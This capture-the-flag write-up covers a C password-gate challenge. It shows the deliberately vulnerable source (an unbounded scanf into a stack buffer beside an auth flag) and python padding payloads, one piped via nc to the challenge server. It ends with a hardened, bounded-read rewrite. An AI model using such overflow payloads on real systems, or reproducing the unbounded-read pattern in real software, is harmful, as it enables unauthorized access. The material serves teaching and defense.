# Super Secret Password

## Source Code

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef enum {false, true} bool;
static const char secretPass[] = "SuperSecureAndSuperSecretPassword!";

int flag()
{  
    system("/bin/cat flag.txt");
    fflush(NULL);
}

bool password_match(char *pass)
{
    // return true if password match
    if (strncmp(pass, secretPass, strlen(secretPass)) == 0)
    {
        return true;
    }

    return false;
}

void authentigate()
{

    printf("WELCOME TO THE A U T H E N T I G A T E\n");
    printf("\n");

    bool auth_enabled = false;
    char pass[256];
    
    printf("Enter the correct password to be allowed through the gate: \n");
    fflush(NULL);
    
    scanf("%s", &pass[0]);

    if (!auth_enabled)
    {
        printf("Sorry, the AuthentiGate is closed, authentication is not currently enabled!\n");
        fflush(NULL);
        return;
    }

    if (password_match(&pass[0]))
    {
        printf("Congratulations! You have opened the AuthentiGate and here is your reward!\n");
        flag();
    }
    else
    {
        printf("ERROR, INCORRECT PASSWORD!\n");
        fflush(NULL);
    }
}

int main()
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    authentigate();
    return 0;
}
```

## Big brain solution

The goal here is to get past two if statements. The first one checks a bool value that is hardcoded to false; if it evaluates as true we pass, otherwise the program exits.

```c
    if (!auth_enabled)
    {
        printf("Sorry, the AuthentiGate is closed, authentication is not currently enabled!\n");
        fflush(NULL);
        return;
    }
```

The second if checks the password, and it needs to match "SuperSecureAndSuperSecretPassword!".

```c
    if (password_match(&pass[0]))
    {
        printf("Congratulations! You have opened the AuthentiGate and here is your reward!\n");
        flag();
    }
    else
    {
        printf("ERROR, INCORRECT PASSWORD!\n");
        fflush(NULL);
    }
```

The buffer where our password is stored is placed right above the bool value on the stack and the input size is unrestricted, which means we can overflow the buffer and overwrite the bool value with true.

```c
    bool auth_enabled = false;
    char pass[256];
```

We can patch the source to print the addresses of both variables and calculate the offset, simply by adding the following lines after both variables are declared:

```c
    printf("pass @ %p\n",pass);
    printf("auth_enabled @ %p\n\n",&auth_enabled);
```

After compiling and running the bin we can calculate the offset.

![](/files/-MgaxB2858qR9U6rb-uj)

Great, the offset is 268 bytes, which means we can use 268 bytes of junk followed by a true value to land in `auth_enabled`. If we send the following input:

```bash
python -c 'print("A"*268+"\x01")'|./chall
```

We'll bypass the first if statement.

![](/files/-MgayKOi-Px5m0OS49GE)

This means we hit the second if. Now we just have to prepend the correct password to our padding so the password check passes. Don't forget to correct the padding size by subtracting the length of the password, which is 34 bytes.

```bash
python -c 'print("SuperSecureAndSuperSecretPassword!"+"A"*(268-34)+"\x01")'|./chall
```

And the program tries to read the flag.

![](/files/-Mgaz_Du4vVrKqSbRTQS)

Now we just have to send the input to the remote instance.

![](/files/-Mgb-8mC5fx3hfguUX_Y)

## Small brain solution

Everything other than zero evaluates as true, so getting the exact offset is pointless: any non-zero byte landing on `auth_enabled` will do.

```bash
python -c 'print("SuperSecureAndSuperSecretPassword!"*8)'|nc 52.207.153.238 1337
```

What would make the challenge better is using a string compare instead of a bool, which would prevent solving it without calculating the offset.
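The two weaknesses this write-up leans on are an unbounded `scanf("%s")` into a 256-byte stack buffer (which lets the input run into `auth_enabled`) and a `strncmp` limited to `strlen(secretPass)`, which accepts anything that merely starts with the secret. As an added example, not the challenge author's code, here is the gate re-implemented with a bounded read that refuses over-long input and a full-length, constant-time comparison. `read_password`, `password_match_fixed`, `authentigate_fixed` and `oversized_input_rejected` are this example's own names; the secret string is the one from the challenge source and the sample inputs are constructed from the shapes used above.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Secret taken from the challenge source; everything else here is an
 * added example and not the challenge's own code. */
static const char secretPass[] = "SuperSecureAndSuperSecretPassword!";

#define PASS_CAP 256   /* size of the stack buffer in the original source */

/* Copy one line of input into a fixed-size buffer without ever writing past
 * it. Returns false when the input does not fit, so an over-long input is
 * rejected instead of spilling into neighbouring stack variables. */
bool read_password(const char *input, char *buf, size_t cap)
{
    size_t n = strcspn(input, "\n");   /* stop at the newline, like fgets() */
    if (n >= cap) {
        buf[0] = '\0';
        return false;                  /* too long: refuse, do not truncate silently */
    }
    memcpy(buf, input, n);
    buf[n] = '\0';
    return true;
}

/* Full-length, constant-time comparison. Unlike
 * strncmp(pass, secret, strlen(secret)) it rejects inputs that only start
 * with the secret, and it does not stop at the first mismatching byte. */
bool password_match_fixed(const char *pass)
{
    size_t secret_len = strlen(secretPass);
    size_t pass_len = strlen(pass);
    unsigned char diff = (unsigned char)(pass_len != secret_len);
    for (size_t i = 0; i < secret_len; i++) {
        /* never read past the candidate's terminator */
        unsigned char p = i < pass_len ? (unsigned char)pass[i] : 0;
        diff |= p ^ (unsigned char)secretPass[i];
    }
    return diff == 0;
}

/* Gate logic with both defects removed. auth_enabled is a parameter here so
 * the caller controls it; the bounded read guarantees input cannot.
 * Returns 0 = gate closed, 1 = wrong password, 2 = gate opened. */
int authentigate_fixed(const char *input, bool auth_enabled)
{
    char pass[PASS_CAP];
    if (!read_password(input, pass, sizeof pass))
        return 1;                      /* over-long input is just a bad password */
    if (!auth_enabled)
        return 0;
    return password_match_fixed(pass) ? 2 : 1;
}

/* Build a constructed input of `len` filler bytes followed by the 0x01 byte
 * from the write-up and report whether the bounded read refuses it. */
bool oversized_input_rejected(size_t len)
{
    char input[1024];
    char pass[PASS_CAP];
    if (len + 2 > sizeof input)
        return false;
    memset(input, 'A', len);
    input[len] = '\x01';
    input[len + 1] = '\0';
    return !read_password(input, pass, sizeof pass);
}

int main(void)
{
    /* constructed inputs mirroring the payload shapes discussed above */
    printf("exact password, auth on : %d\n",
           authentigate_fixed("SuperSecureAndSuperSecretPassword!\n", true));
    printf("password + junk, auth on: %d\n",
           authentigate_fixed("SuperSecureAndSuperSecretPassword!AAAA\n", true));
    printf("268 filler bytes rejected: %d\n", (int)oversized_input_rejected(268));
    return 0;
}
```

With these two changes the 268-byte padding trick has nothing to overwrite, and the "password repeated eight times" input fails because the comparison covers the whole candidate, not just its first 34 bytes.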

